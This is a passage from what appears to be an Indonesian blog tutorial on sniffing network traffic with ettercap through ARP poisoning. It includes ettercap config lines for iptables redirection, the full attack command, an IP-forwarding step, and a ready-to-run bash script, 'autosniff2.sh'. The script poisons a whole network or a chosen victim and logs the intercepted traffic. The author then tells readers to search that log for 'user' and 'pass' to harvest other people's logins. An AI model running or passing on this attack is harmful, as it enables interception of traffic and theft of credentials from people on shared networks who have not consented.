# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: this script is executed with an execve(), so you can't use pipes or
# output redirection as if you were in a shell. We suggest you to make a script if
# you need those commands.
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
hilangkan tanda ' # ' . kemudian save...ukey...
3. jalankan ettercapnya..
# sudo ettercap -Tq -i wlan0 -M arp // //
penjelasan :
-T = mode ettercapnya
-i = interface yang aktif (bisa di lihat dg mengetikan ifconfig di terminal)
-q quiet mode
-M = arp poisoning
sementara tanda // // adalah default gatway & client ini bisa di isi dengan ip victim (jika victim tunggal)
jangan lupa forward ip juga ya...
# echo 1 > /proc/sys/net/ipv4/ip_forward
ukey.,.selesai...tinggal tunggu hasilnya saja.,.:)
NB :
jika belum familiar dengan console..
saya sudah siapkan sdkit script bashnya...
jadi tinggal jalankan 1 script saja..udh bisa jalankan ettercap koq..
langsung copas scriptnya...:)
--------------cut here-----------------------------------------------
########################################################
# c0de by yur4kh4 #
# auto sniff #
# Malang cyber crew #
# contact :yur4kh4[at]mc-crew[dot]net #
########################################################
#!/bin/bash
sleep 3
echo "jangan malas untuk menulis di console"
sleep 2
echo -n "network card yang terkoneksi gan? ex: wlan0: "
read -e IFACE
echo -n "Gateway IP - biarkan kosong (default): "
read -e ROUTER
echo -n "Target IP - biarkan kosong (babat semua IP): "
read -e VICTIM
ettercap -Tq -i $IFACE -M arp /$ROUTER/ /$VICTIM/ -w yur4.txt
--------------cut here-----------------------------------------------
save dengan nama autosniff2.sh
kemudian beri hak akses root
# chmod +x autosniff2.sh
masih di terminal jalankan dech scriptnya
# ./autosniff2.sh
tinggal tunggu saja...
pastikan ettercap sudah di install & sudah di konfigurasi dengan benar...
pastikan juga bahwa ip sudah di forward..
untuk berhenti tekan ' q ' 'Q' <
script ini akan menghasilkan log yur4.txt
buka hasil log tersebut...
menggunakan kate or apa saja lach yang penting bisa terbaca...:p
kemudian search or ctrl F masukan keywords "pass" atau bisa juga "user"
heee.,.
kalo ada yang tersniffing maka akan tampil tu user sama pass orang.,.:p
tested on backtrack 4
Subscribe to:
Posts (Atom)

